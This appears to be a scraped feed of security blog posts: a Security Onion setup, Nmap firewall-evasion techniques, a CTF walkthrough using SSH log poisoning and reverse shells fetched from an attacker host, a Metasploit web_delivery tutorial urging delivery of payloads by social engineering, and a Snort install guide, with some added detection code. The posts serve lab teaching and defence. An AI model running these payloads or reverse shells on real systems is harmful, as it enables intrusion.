News from 'Hacking Articles'

Raj Chandel's Blog

Security Onion Configuration in VMware

Fri, 08/Dec/2017 - 20:59

Security Onion is a Linux distro for intrusion detection, network security monitoring, and log management. It’s based on Ubuntu and contains Snort, Suricata, Bro, OSSEC, Sguil, Squert, ELSA, Xplico, NetworkMiner, and many other security tools. The easy-to-use Setup wizard allows you to build an army of distributed sensors for your enterprise in minutes!

Security Onion combines two main roles: full packet capture, and intrusion detection with both network-based (NIDS) and host-based (HIDS) systems.

It also ships analysis tools that work on the captured packets in real time.

NIDS: Snort or Suricata, together with Bro, perform network intrusion detection by matching traffic against fingerprints and identifiers of known malicious, abnormal or otherwise suspicious traffic.

HIDS: Security Onion offers OSSEC for host-based intrusion detection.

Sguil: It is the crucial Security Onion tool for network security analysts. Sguil’s main component is an intuitive GUI that gives access to real-time events, session data, and raw packet captures.

Squert: It is a web application that is used to query and view event data stored in a Sguil database.

ELSA: Enterprise Log Search and Archive is a three-tier log receiver, archiver, indexer, and web frontend for incoming syslog. 


Let’s start!!

Create VM for Security Onion installation

Open VMware, select “Create a New Virtual Machine”, and in the wizard choose the second option:

“Installer disc image file (iso)”, then browse to the Security Onion ISO file.

Then click Next.

Now select the 2nd option, “Linux”, as the guest operating system and choose the version “Ubuntu”. Click Next through the remaining steps as per your requirements.

Open “Customize Hardware” to make the following changes:

Select a bridged connection and enable the “replicate connection” check box in the network adapter settings. Then add a second network adapter and select a bridged connection for it as well.

Then click on finish.

Installation

The VM boots automatically into the Security Onion installer.

At the welcome screen, select a language and click “Continue”. Here we have chosen English as the preferred language.

Read the content and then click “Continue”.

Choose the radio button “Erase the disk and install Security Onion” to begin the installation and click “Install Now”.

Click “Continue” and it will proceed with disk partitioning.

Confirm your location, select your time zone and then click “Continue”.

Choose the keyboard layout “English (US)” and then click “Continue”.

Now create your profile by entering your details as given below:

Enter your name: Ignite

Enter your computer’s name: Ignite-pc

Select a username: Ignite

Enter a password: 1234

Click “Continue”

Installation may take some time; when it is complete, click “Restart Now” to boot into the new installation.

Security Onion configuration 1st part

To configure Security Onion as a real-time NIDS and HIDS system we have divided the configuration into two parts.

Now enter your username and password to log in, as shown in the image below.

On the desktop you can see a Setup icon; click it to configure the network interfaces.

Configure 1st network adapter for management interface

Click the “Setup” icon on the desktop to configure Security Onion on your system.

Click “Yes, Continue”.

Click “Yes” to configure /etc/network/interfaces now, as shown in the image below.

Choose eth0 as the network interface to be used as the management interface, as shown in the image below.

Choose static addressing for eth0, as shown in the image below.

Enter a static IP for your management interface, as shown in the image.

Enter the subnet mask for static addressing, as shown in the image below.

Enter the gateway, as shown in the image below.

Enter the DNS server IP; it can be 192.168.1.1 or 8.8.8.8, or both separated by spaces.

Enter your local domain name, as shown in the image below.

Configure 2nd network adapter for sniffing interface

Click “Yes” to configure the sniffing interfaces now, as shown in the image below.

Choose eth1 as the network interface to be used as the sniffing interface.

The image below shows a summary of the network interface configuration. Click “Yes” to proceed to the next step.

Network configuration is complete; now click “Yes, Reboot”.

Security onion configuration 2nd part

After the restart, click the “Setup” icon again to continue configuring Security Onion as a real-time monitoring machine. Then click “Yes, Continue”.

Since we have already configured the network interfaces, click “Yes, skip network configuration”.

Select “Stable setup”, which will configure ELSA; then click OK.

Select “Evaluation Mode”, which configures Snort and Bro to monitor one network interface; then click OK.

Select eth1 as the network interface to be monitored, as shown in the image.

Now add a username for Sguil, Squert and ELSA, as shown in the image below.

Enter the password for that username; you will use it to log in to Sguil, Squert and ELSA.

The next dialog box displays a summary of the configuration settings. Click “Yes, proceed with the changes”.

Setup then stops all the NSM services, which manage the monitoring services from creation to deletion, while it applies the changes.

Security Onion configuration is now complete. You will see icons for Sguil, Squert and ELSA on the desktop. Click the Sguil icon and enter your username and password to log in to Sguil.

Select the network interface eth1 to monitor, as shown in the image below, and click “Start SGUIL”.

It will work as a real-time system and start capturing traffic, as shown in the image below.

Great!! Now analyse your network traffic with a real-time machine.

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here

The post Security Onion Configuration in VMware appeared first on Hacking Articles.

Categories: Cyber India

Understanding Guide to Nmap Firewall Scan (Part 2)

Sat, 02/Dec/2017 - 22:30

In our previous article we demonstrated “Nmap firewall scan (part 1)” by applying iptables rules and then trying to bypass the firewall filters with Nmap's advanced scanning options; today we discuss the second part.

Requirement

Attacker: Kali Linux

Target: Ubuntu  

Spoof MAC Address Scan

Allow TCP Packet from Specific Mac Address

If a network admin wants to allow TCP connections only from a specific MAC address and not from any other system, he could use the following iptables rules to apply a firewall filter on his network. The ACCEPT rule must sit above the REJECT rule, so the REJECT is appended with -A after the ACCEPT has been inserted with -I.

iptables -I INPUT -p tcp -m mac --mac-source AA:AA:AA:AA:AA:AA -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

Now when the attacker performs a basic network scan of the target, he is not able to enumerate the ports and running services of the victim's system.

nmap 192.168.1.117

To bypass the filter above, the attacker may run netdiscover or an Nmap host scan in the Kali Linux terminal to identify the active hosts in the network. As a result he gets a table containing the MAC address and IP address of each active host on the local network.

Now either try each MAC address one by one in the nmap command, or save all the MAC addresses in a text file and give its path to nmap. To do this the attacker first needs to enable promiscuous mode on his network interface. Type the commands below: the first enables promiscuous mode and the second runs the nmap scan.

ip link set eth0 promisc on

nmap --spoof-mac AA:AA:AA:AA:AA:AA 192.168.1.117

Hence if you are lucky enough to spoof the correct MAC address, you can bypass the firewall filter and establish TCP connections with the victim's system for port enumeration.

Nice!!! In the image below you can observe the open ports of the target.

Allow TCP Packet from Specific IP

If a network admin wants to allow TCP connections only from a specific IP and not from any other system, he could use the following iptables rules to apply a firewall filter on his network. Both rules are inserted with -I, so the ACCEPT inserted second ends up above the REJECT.

iptables -I INPUT -p tcp -j REJECT --reject-with tcp-reset

iptables -I INPUT -p tcp -s 192.168.1.120 -j ACCEPT

Now when the attacker again performs a basic network scan of the target, he is not able to enumerate the ports and running services of the victim's system.

nmap 192.168.1.117

Spoof IP Address

To bypass the filter above, the attacker may again run netdiscover or an Nmap host scan in the Kali Linux terminal to identify the active hosts in the network. As a result he gets a table containing the MAC address and IP address of each active host on the local network.

Now either try each IP address one by one in the nmap command, or save all the IP addresses in a text file and give its path to nmap, and then execute the following command:

nmap -e eth0 -S 192.168.1.120 192.168.1.117

Hence if you are lucky enough to spoof the correct IP address, you can bypass the firewall filter and establish TCP connections with the victim's system for port enumeration.

Great!! In the image below you can observe the open ports of the target.
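The per-MAC and per-IP allow rules above are only as strong as the address fields they trust, which is exactly what the two spoofing scans exploit. The detection below is an added example and is not part of the original article or of any of the tools it mentions: it assumes the admin has placed an iptables LOG rule ahead of the REJECT rule (for instance `-j LOG --log-prefix "tcp-in: "`) and keeps a table of which hardware address each allow-listed IP is supposed to come from. It parses the kernel's LOG lines, flags packets whose SRC is an allow-listed IP but whose Ethernet source MAC is not the one bound to it, and counts distinct destination ports per source MAC, which groups a port sweep together even when the source IP is being spoofed. All addresses and log lines are constructed.

```python
import re
from collections import defaultdict

# Constructed iptables LOG lines (assumed prefix "tcp-in:"), not from the article.
# The kernel's MAC= field is destination MAC (6 bytes), source MAC (6 bytes) and
# EtherType (2 bytes), so the Ethernet source address is octets 7 to 12.
SAMPLE_LOG = """\
Dec  2 22:10:01 ubuntu kernel: [ 1001.10] tcp-in: IN=eth0 OUT= MAC=08:00:27:11:22:33:aa:aa:aa:aa:aa:aa:08:00 SRC=192.168.1.120 DST=192.168.1.117 LEN=60 TTL=64 PROTO=TCP SPT=51000 DPT=22 SYN
Dec  2 22:10:02 ubuntu kernel: [ 1002.20] tcp-in: IN=eth0 OUT= MAC=08:00:27:11:22:33:aa:aa:aa:aa:aa:aa:08:00 SRC=192.168.1.120 DST=192.168.1.117 LEN=60 TTL=64 PROTO=TCP SPT=51001 DPT=80 SYN
Dec  2 22:10:05 ubuntu kernel: [ 1005.30] tcp-in: IN=eth0 OUT= MAC=08:00:27:11:22:33:de:ad:be:ef:00:01:08:00 SRC=192.168.1.120 DST=192.168.1.117 LEN=44 TTL=48 PROTO=TCP SPT=40001 DPT=21 SYN
Dec  2 22:10:05 ubuntu kernel: [ 1005.31] tcp-in: IN=eth0 OUT= MAC=08:00:27:11:22:33:de:ad:be:ef:00:01:08:00 SRC=192.168.1.120 DST=192.168.1.117 LEN=44 TTL=48 PROTO=TCP SPT=40001 DPT=23 SYN
Dec  2 22:10:05 ubuntu kernel: [ 1005.32] tcp-in: IN=eth0 OUT= MAC=08:00:27:11:22:33:de:ad:be:ef:00:01:08:00 SRC=192.168.1.120 DST=192.168.1.117 LEN=44 TTL=48 PROTO=TCP SPT=40001 DPT=25 SYN
Dec  2 22:10:05 ubuntu kernel: [ 1005.33] tcp-in: IN=eth0 OUT= MAC=08:00:27:11:22:33:de:ad:be:ef:00:01:08:00 SRC=192.168.1.120 DST=192.168.1.117 LEN=44 TTL=48 PROTO=TCP SPT=40001 DPT=443 SYN
"""

# The admin's expected binding of each allow-listed IP to its hardware address
# (constructed to match the article's example addresses).
KNOWN_BINDINGS = {"192.168.1.120": "AA:AA:AA:AA:AA:AA"}

LOG_RE = re.compile(
    r"IN=(?P<iface>\S*) OUT=\S* MAC=(?P<mac>[0-9a-fA-F:]+) SRC=(?P<src>\S+) DST=(?P<dst>\S+)"
    r".*?PROTO=(?P<proto>\S+)(?: SPT=(?P<spt>\d+) DPT=(?P<dpt>\d+))?"
)


def parse_log_line(line):
    """Return the fields we need from one kernel LOG line, or None if it is not one."""
    m = LOG_RE.search(line)
    if not m:
        return None
    octets = m.group("mac").lower().split(":")
    if len(octets) != 14:          # dst(6) + src(6) + ethertype(2)
        return None
    return {
        "iface": m.group("iface"),
        "src_mac": ":".join(octets[6:12]),
        "src": m.group("src"),
        "dst": m.group("dst"),
        "proto": m.group("proto"),
        "dpt": int(m.group("dpt")) if m.group("dpt") else None,
    }


def find_mac_mismatches(lines, bindings):
    """(claimed_ip, observed_mac) pairs where SRC is an allow-listed IP but the
    frame did not come from the hardware address bound to it."""
    expected = {ip: mac.lower() for ip, mac in bindings.items()}
    seen = set()
    for line in lines:
        pkt = parse_log_line(line)
        if pkt and pkt["src"] in expected and pkt["src_mac"] != expected[pkt["src"]]:
            seen.add((pkt["src"], pkt["src_mac"]))
    return sorted(seen)


def find_port_sweeps(lines, threshold=3):
    """Distinct TCP destination ports per source MAC. Keying on the MAC rather than
    on SRC keeps a sweep together even when the source IP is spoofed."""
    ports = defaultdict(set)
    for line in lines:
        pkt = parse_log_line(line)
        if pkt and pkt["proto"] == "TCP" and pkt["dpt"] is not None:
            ports[pkt["src_mac"]].add(pkt["dpt"])
    return {mac: len(p) for mac, p in ports.items() if len(p) >= threshold}


if __name__ == "__main__":
    lines = SAMPLE_LOG.splitlines()
    print("MAC/IP mismatches:", find_mac_mismatches(lines, KNOWN_BINDINGS))
    print("port sweeps:", find_port_sweeps(lines))
```

Run against the sample, the allow-listed IP shows up behind a second hardware address and that address alone touches four distinct ports, which is the signal a spoofed-IP scan leaves even though every packet claimed a trusted source. A spoofed MAC from a different host does not trip the binding check, but it still shows up in the port-sweep count, and on a real switch it also surfaces as MAC flapping between ports.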

Data-String Scan

Allow TCP Packet from Specific String

If a network admin wants to allow TCP connections only from a system whose packets contain a specific string, and to reject every other system whose packets do not contain that special string, he could use the following iptables rules to apply a firewall filter on his network.

iptables -I INPUT -p tcp -m string --algo bm --string "Khulja sim sim" -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In the rules above we used “Khulja sim sim” as the special string for establishing a TCP connection. Hence only those TCP connections whose packets contain “Khulja sim sim” can be established.

Now when the attacker again performs a basic network scan of the target, he is not able to enumerate the ports and running services of the victim's system, because the traffic generated from his machine does not contain the special string, so the target's firewall discards all of the attacker's TCP packets.

nmap 192.168.1.117

If the attacker somehow sniffs the special string “Khulja sim sim” used to connect to the target, he can use the --data-string argument in the nmap command to bypass the firewall.

nmap --data-string "Khulja sim sim" 192.168.1.117

Hence if you are lucky enough to sniff the correct data string, you can bypass the firewall filter and establish TCP connections with the victim's system for port enumeration.

Wonderful!! In the image below you can observe the open ports of the target.

Hex String Scan

Allow TCP Packet from Specific Hex String

If a network admin wants to allow TCP connections only from a system whose packets contain the hexadecimal value of a particular string, and to reject every other system whose packets do not contain that hex value, he could use the following iptables rules to apply a firewall filter on his network.

iptables -I INPUT -p tcp -m string --algo kmp --hex-string "RAJ" -j ACCEPT

iptables -A INPUT -p tcp -j REJECT --reject-with tcp-reset

In the rules above we used the hex value of “RAJ” as the special string for establishing a TCP connection. Hence only those TCP connections whose packets contain the hex value of “RAJ” can be established.

Now when the attacker again performs a basic network scan of the target, he is not able to enumerate the ports and running services of the victim's system, because the traffic generated from his machine does not contain the hex value of the special string, so the target's firewall discards all of the attacker's TCP packets.

nmap 192.168.1.117

If the attacker somehow sniffs the special string “RAJ” used to connect to the target, he can use its hex values with the --data argument in the nmap command to bypass the firewall.

nmap --data "\x52\x41\x4a" 192.168.1.117

Hence if you are lucky enough to sniff the correct hex value of the data string, you can bypass the firewall filter and establish TCP connections with the victim's system for port enumeration.

Hence, in the image below you can observe the open ports of the target.

IP-Options Scan

Reject TCP packets that contain a tcp-option

By default nmap sends 24 bytes of TCP data, of which 4 bytes are reserved for TCP options. A network admin can reject packets carrying TCP option number 4, discarding the TCP connection, to protect his network from scanning. Type the following iptables rule to reject TCP option 4 on his network:

iptables -A INPUT -p tcp --tcp-option 4 -j REJECT --reject-with tcp-reset

Now when the attacker performs a TCP connect scan (-sT) on the target, he is not able to enumerate the ports and running services of the victim's system, since the packets carry TCP option 4 and the firewall discards them.

nmap -sT 192.168.1.117

The IP protocol offers numerous options that can be placed in packet headers. Unlike the ubiquitous TCP options, IP options are rarely seen, for security reasons. The most powerful way to specify IP options is to simply pass hexadecimal data as the argument to --ip-options.

Precede every hex byte value with \x. You may repeat a byte by following it with an asterisk and then the number of times you wish it to repeat. For example, \x01\x07\x04\x00*4 is the same as \x01\x07\x04\x00\x00\x00\x00 (the repeated \x00 bytes are null bytes).

Now type the following command with the --ip-options argument, as shown below:

nmap --ip-options "\x00\x00\x00\x00\x00*" 192.168.1.117

Note that if you specify a number of bytes that is not a multiple of four, an incorrect IP header length will be set in the IP packet. The reason for this is that the IP header length field can only express multiples of four. In those cases, the length is computed by dividing the header length by 4 and rounding down.
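To make the --ip-options syntax and the header-length caveat concrete, here is an added example (not code from the article or from the Nmap project) that parses the \xHH and *N notation, decodes the resulting option list as kind/length/data triples, and computes the IHL field that results from dividing the header length by four and rounding down. The option-kind names are the RFC 791 values; a bare `*` with no repeat count, as in the command above, is treated as malformed input rather than guessed at.

```python
import re

IPV4_BASE_HEADER = 20   # bytes in an IPv4 header that carries no options
IPV4_MAX_HEADER = 60    # IHL is a 4-bit count of 32-bit words, so at most 15 * 4

# IPv4 option kinds from RFC 791 (kind -> name). Kinds 0 and 1 are single-byte
# options; every other kind is followed by a length byte covering kind+length+data.
OPTION_NAMES = {0: "EOL", 1: "NOP", 7: "RR", 68: "TS", 130: "SEC",
                131: "LSRR", 136: "SID", 137: "SSRR"}

# One token of nmap's hex syntax: \xHH optionally followed by *N.
TOKEN = re.compile(r"\\x([0-9a-fA-F]{2})(?:\*(\d+))?")

# The example spelled out in the text above.
ARTICLE_EXAMPLE = r"\x01\x07\x04\x00*4"


def parse_hex_options(spec):
    """Expand a --ip-options hex string into raw option bytes.

    Raises ValueError on anything that is not a \\xHH token or a *N repeat,
    including a trailing '*' without a count."""
    out = bytearray()
    pos = 0
    for m in TOKEN.finditer(spec):
        if m.start() != pos:
            raise ValueError(f"unexpected text at offset {pos}: {spec[pos:m.start()]!r}")
        out.extend([int(m.group(1), 16)] * int(m.group(2) or 1))
        pos = m.end()
    if pos != len(spec):
        raise ValueError(f"unexpected text at offset {pos}: {spec[pos:]!r}")
    return bytes(out)


def header_length(options):
    """Return (ihl_field, consistent): the IHL value obtained by dividing the full
    header length by 4 and rounding down, and whether that value still describes
    the true header length (False when the option bytes are not a multiple of 4)."""
    total = IPV4_BASE_HEADER + len(options)
    if total > IPV4_MAX_HEADER:
        raise ValueError(f"{len(options)} option bytes exceed the 40-byte maximum")
    ihl = total // 4
    return ihl, ihl * 4 == total


def decode_options(options):
    """Walk the option bytes as (name, data) pairs; stop at EOL or on a bad length."""
    decoded, i = [], 0
    while i < len(options):
        kind = options[i]
        name = OPTION_NAMES.get(kind, f"kind-{kind}")
        if kind in (0, 1):                      # EOL and NOP carry no length byte
            decoded.append((name, b""))
            i += 1
            if kind == 0:
                break
            continue
        if i + 1 >= len(options) or options[i + 1] < 2 or i + options[i + 1] > len(options):
            decoded.append(("MALFORMED", bytes(options[i:])))
            break
        length = options[i + 1]
        decoded.append((name, bytes(options[i + 2:i + length])))
        i += length
    return decoded


def describe(spec):
    """Everything a reviewer wants to know about one --ip-options argument."""
    opts = parse_hex_options(spec)
    ihl, ok = header_length(opts)
    return {"bytes": opts, "ihl": ihl, "length_ok": ok, "options": decode_options(opts)}


if __name__ == "__main__":
    print(describe(ARTICLE_EXAMPLE))
```

For the text's own example the seven option bytes give a 27-byte header, so the IHL field becomes 6 (24 bytes) and no longer matches the data actually sent; padding with one more \x00 makes it 28 bytes and IHL 7, which is consistent. The decoder also shows what those bytes mean: a NOP, a record-route option of length 4, and an end-of-list marker.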

Good! In the image below you can observe the open ports of the target.

https://nmap.org/book/nping-man-ip-options.html


Hack The Ether: EvilScience VM (CTF Challenge)

Thu, 30/Nov/2017 - 20:38

Hello friends! Today we are going to take on another CTF challenge known as The Ether: EvilScience. The credit for making this VM goes to “f1re_w1re”, and it is another boot2root challenge where we have to root the server to complete it. You can download this VM here.

Let’s Breach!!!

Let us start by finding the IP of the VM (here I have it at 192.168.1.146, but you will have to find your own).

netdiscover

Use nmap for port enumeration.

nmap -sV 192.168.1.146

The Nmap scan shows port 80 is open, so we open the IP address in our browser.

We find that the site is vulnerable to LFI. Going through the pages, we find that the index.php file is the one vulnerable to LFI.

We can read auth.log through the LFI. We use Burp Suite to check the response and find that we can use SSH log poisoning to get access to the server.

We now log in over SSH using a basic PHP shell as the username, so that we can use command injection through the log.

ssh '<?php system($_GET["C"]);?>'@192.168.1.146

Now we check whether log injection is possible: we try running the ‘ls’ command and find that it works.

We use web_delivery script in metasploit to gain reverse shell.

msf > use multi/script/web_delivery

msf exploit(web_delivery) > set target 1

msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(web_delivery) > set lhost 192.168.1.131

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > run

Now we run the web delivery script with Python to bypass the firewall.

As soon as we send the request we get the reverse shell.

Now we spawn a TTY shell with Python.

python -c 'import pty; pty.spawn("/bin/bash");'

Now we take a look at the sudoers file. We find that we don’t need a password to run a Python file as root.

Now we run the file as root. When we run it we find that it opens a log file, so we use a pipe to run our commands. We run the id command and find that we can execute commands as root.

Now we set up our listener using netcat.

nc -lvp 5555

Now we create a Python shell and save it in our /var/www/html folder.

We download it into the /tmp folder on the target VM using wget.

wget http://192.168.1.108/shell.py -O /tmp/shell.py

Let’s run the shell with Python on the target machine.

As soon as we run the shell we get a reverse shell. We run the id command to check the user. We move to the root directory and find an image file called flag.png.

We check the strings inside the image using the tail command.

tail flag.png

Inside the image file we find a flag in base64 encoding.

We decode the base64 encoded string.

echo 'base64-encoded-string' | base64 -d

Author: Sayantan Bera is a technical writer at Hacking Articles and a cyber security enthusiast. Contact Here


Command Injection Exploitation using Web Delivery (Linux, Windows)

Thu, 30/Nov/2017 - 17:34

Hello friends! In this article you will learn how to exploit three different platforms [Linux, Windows and PHP] using a single exploit of the Metasploit framework.

Requirement

Attacker: Kali Linux

Targeted platforms: Windows, PHP, Linux [Ubuntu]

Open the terminal in your Kali Linux and type “msfconsole” to load the Metasploit framework, then execute the exploit given below.

This module quickly fires up a web server that serves a payload. The provided command will allow the payload to be downloaded and executed, either through the specified scripting language interpreter or via “squiblydoo” using regsvr32.exe to bypass application whitelisting. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command, e.g. command injection, an RDP session, local access or remote command execution. This attack vector does not write to disk, so it is less likely to trigger AV solutions, and it allows the privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer, or use the SYSWOW64 powershell.exe to execute x86 payloads on x64 machines. Regsvr32 uses the “squiblydoo” technique for bypassing application whitelisting: the signed Microsoft binary Regsvr32 is able to request an .sct file and then execute the PowerShell command included inside it. Both web requests (i.e. the .sct file and the PowerShell download/execute) can occur on the same port. “PSH (Binary)” will write a file to disk, allowing custom binaries to be served up to be downloaded/executed.

use exploit/multi/script/web_delivery

msf exploit(web_delivery) > show targets

In the image below you can observe that there are 5 targets, which help you generate malicious code to create a backdoor on the victim's system.

Exploit Linux Platform [python]

use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set lhost 192.168.1.132 (IP of Kali Linux)

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > set target 0

msf exploit(web_delivery) > set payload python/meterpreter/reverse_tcp

msf exploit(web_delivery) > run

In this exploit we set target 0 to generate malicious code for the Python platform; in the image below you can observe the highlighted malicious Python code. Now copy it and send it to the victim using a social engineering method.

As soon as the victim executes the malicious code in a terminal, the attacker obtains a meterpreter session, i.e. unauthorized access to the victim's system.

Exploit Linux Platform [PHP]

use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set lhost 192.168.1.132 (IP of Kali Linux)

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > set target 1

msf exploit(web_delivery) > set payload php/meterpreter/reverse_tcp

msf exploit(web_delivery) > run

Now we set target 1 to generate malicious code for the PHP platform; in the image below you can observe the highlighted malicious PHP code. Now copy it and send it to the victim using a social engineering method.

As soon as the victim executes the malicious code in a web browser, the attacker obtains another meterpreter session, i.e. unauthorized access to the victim's system.

Exploit Windows Platform [exe]

use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set lhost 192.168.1.132

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > set target 2

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > run

Further, we set target 2 to generate malicious code for the Windows platform; in the image below you can observe the highlighted malicious powershell.exe command. Now copy it and send it to the victim using a social engineering method.

As soon as the victim executes the malicious code in the command prompt, the attacker obtains a meterpreter session, i.e. unauthorized access to the victim's system.

Exploit Windows Platform [DLL]

use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set lhost 192.168.1.132

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > set target 3

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > run

In this exploit we set target 3 to generate malicious code for the Windows platform; in the image below you can observe the highlighted malicious DLL code. Now copy it and send it to the victim using a social engineering method.

As soon as the victim executes the malicious code as a run command inside the RUN window, the attacker again obtains a meterpreter session and unauthorized access to the victim's system.

Exploit Windows Platform [Powershell Binary]

use exploit/multi/script/web_delivery

msf exploit(web_delivery) > set lhost 192.168.1.132

msf exploit(web_delivery) > set lport 4444

msf exploit(web_delivery) > set target 4

msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp

msf exploit(web_delivery) > run

In this exploit we set target 4 to generate malicious code for the Windows platform; in the image below you can observe the highlighted malicious powershell.exe binary code. Now copy it and send it to the victim using a social engineering method.

As soon as the victim executes the malicious code in the command prompt, the attacker obtains a meterpreter session, i.e. unauthorized access to the victim's system.

Hence a single exploit, “web delivery”, is quite helpful for hacking three different platforms.
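From the defender's side, every web_delivery target leaves the same footprint in process-creation telemetry: an interpreter (python, php, powershell.exe) or regsvr32.exe fetching content over HTTP and executing it in memory. The detection below is an added example, not code from the article or from Metasploit. The event records and their command lines are constructed to resemble what the module's targets produce (the regsvr32 form is the “squiblydoo” scriptlet pattern the module description above mentions, which loads scrobj.dll), and the rule set matches on the image name plus a download-and-execute indicator, pulling out the staging URL for triage. Two benign events are included to show the rules do not fire on ordinary regsvr32 or PowerShell use.

```python
import re

# Constructed process-creation events, shaped loosely like Sysmon event 1 or an
# auditd execve record. Hosts, paths and URLs are made up for this example.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://10.0.0.5:8080/abc.sct scrobj.dll"},
    {"host": "ws01", "image": r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring('http://10.0.0.5:8080/xyz'))"},
    {"host": "web01", "image": "/usr/bin/python",
     "cmdline": "python -c \"import urllib2;exec(urllib2.urlopen('http://10.0.0.5:8080/Q').read())\""},
    {"host": "web01", "image": "/usr/bin/php",
     "cmdline": "php -d allow_url_fopen=true -r \"eval(file_get_contents('http://10.0.0.5:8080/Q'));\""},
    # Benign: a vendor installer registering a local DLL, and a scheduled script.
    {"host": "ws02", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmdline": r"regsvr32.exe /s C:\Program Files\Vendor\vendor.dll"},
    {"host": "ws02", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
]

URL_RE = re.compile(r"https?://[^\s'\")]+", re.I)

# (rule name, accepted image basenames, patterns that must ALL match the command line)
RULES = [
    ("regsvr32 remote scriptlet (squiblydoo)", ("regsvr32.exe",),
     (r"/i:https?://", r"scrobj\.dll")),
    ("powershell download-and-execute", ("powershell.exe",),
     (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b", r"\biex\b|invoke-expression")),
    ("python fetch-and-exec one-liner", ("python", "python2", "python3"),
     (r"urlopen\(", r"\bexec\(")),
    ("php fetch-and-eval one-liner", ("php",),
     (r"file_get_contents\(\s*['\"]https?://", r"\beval\(")),
]


def image_name(image):
    """Basename of the executable, normalised for Windows or POSIX paths."""
    return image.replace("\\", "/").rsplit("/", 1)[-1].lower()


def match_event(event):
    """Return a finding dict for the first rule that fires on this event, else None."""
    name = image_name(event["image"])
    cmd = event["cmdline"]
    for rule, images, patterns in RULES:
        if name in images and all(re.search(p, cmd, re.I) for p in patterns):
            url = URL_RE.search(cmd)
            return {"host": event["host"], "rule": rule,
                    "url": url.group(0) if url else None}
    return None


def scan_events(events):
    """Run every rule over every event; benign events simply produce no finding."""
    return [m for m in (match_event(e) for e in events) if m]


if __name__ == "__main__":
    for finding in scan_events(SAMPLE_EVENTS):
        print(f"{finding['host']}: {finding['rule']} -> {finding['url']}")
```

The staging URL is the most useful pivot: all four findings point at the same host and port, which is exactly how a single web_delivery listener serving several targets looks from the SOC. In production the same rules would run over the real telemetry feed rather than this constructed list, and the PowerShell rule in particular benefits from also inspecting encoded (-enc) command lines, which this example does not decode.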

Author: Sanjeet Kumar is an Information Security Analyst | Pentester | Researcher. Contact Here


IDS, IPS Penetration Testing Lab Setup with Snort

Wed, 29/Nov/2017 - 21:34

Hello friends! As you must be aware, IT-sector organisations face various types of security issues daily. There are many types of firewalls, IDSs and third-party software available to root out the major types of security issues in a network.

In this article you will learn how to configure the famous Snort as an IDS, as used by IT-sector organisations, working as a real-time machine.

Snort is software created by Martin Roesch which is widely used as an Intrusion Prevention System (IPS) and Intrusion Detection System (IDS) in networks. It is separated into five main components: the packet decoder, the preprocessors, the detection engine, the logging and alerting system, and the output modules.

The program is well known for real-time traffic analysis and packet logging on Internet Protocol networks. By monitoring network traffic it is also used to detect probes and attacks such as denial of service attacks, port scans and stealth port scans, buffer overflows and server message block probes.

Snort can be configured in three main modes:

  • Sniffer mode: it observes network packets and presents them on the console.
  • Packet logger mode: it records packets to disk.
  • Intrusion detection mode: the program monitors network traffic and analyses it against a rule set defined by the user.

The application then executes a precise action depending on what has been identified.

Let’s Begin!!

Snort Installation

We chose the Ubuntu 14.04 operating system for installing and configuring Snort. Before installing Snort on your machine, you need to install the necessary Ubuntu dependencies. Open the terminal and type the command below to install the prerequisites:

sudo apt-get install -y build-essential libpcap-dev libpcre3-dev libdumbnet-dev bison flex zlib1g-dev

Now create a folder to download Snort and its dependency packages into. Type the commands below to create a folder “snort_src”, move inside it and download DAQ-2.0.6:

mkdir ~/snort_src && cd ~/snort_src

wget https://snort.org/downloads/snort/daq-2.0.6.tar.gz

Snort needs the DAQ, or Data Acquisition library, for packet I/O. The DAQ replaces direct calls into libpcap functions with an abstraction layer that facilitates operation on a variety of hardware and software interfaces without requiring changes to Snort. It is possible to select the DAQ type and mode when invoking Snort, to perform pcap readback or inline operation, etc. The DAQ library may be useful for other packet processing applications, and its modular nature allows you to build new modules for other platforms.

In the image below you can confirm that we have successfully downloaded the daq-2.0.6 tar file.

Now execute the command below to extract the tar file.

tar xvfz daq-2.0.6.tar.gz

Move inside the daq-2.0.6 folder with the first command below, then run the second command to configure, build and install it automatically.

cd daq-2.0.6

./configure && make && sudo make install

Up to here you have learned how to install daq-2.0.6 for Snort.

Now move back into the snort_src folder and type the command below to download the latest version, snort-2.9.11:

wget https://snort.org/downloads/snort/snort-2.9.11.tar.gz

In the image below you can confirm that we have successfully downloaded the snort-2.9.11 tar file.

Now execute the command below to extract the tar file.

tar xvfz snort-2.9.11.tar.gz

Move inside the snort-2.9.11 folder with the first command below, then run the second command to configure, build and install it automatically.

cd snort-2.9.11

./configure --enable-sourcefire && make && sudo make install

Run the following command to update the shared library cache so the newly installed libraries are found:

sudo ldconfig

Type the command below to create a symbolic link:

sudo ln -s /usr/local/bin/snort /usr/sbin/snort

A symbolic link, also known as a soft link, is a file system entry that points to another file’s name and location. Deleting the symbolic link does not remove the original file. If, on the other hand, the file the soft link points to is removed, the soft link stops working; it is broken.

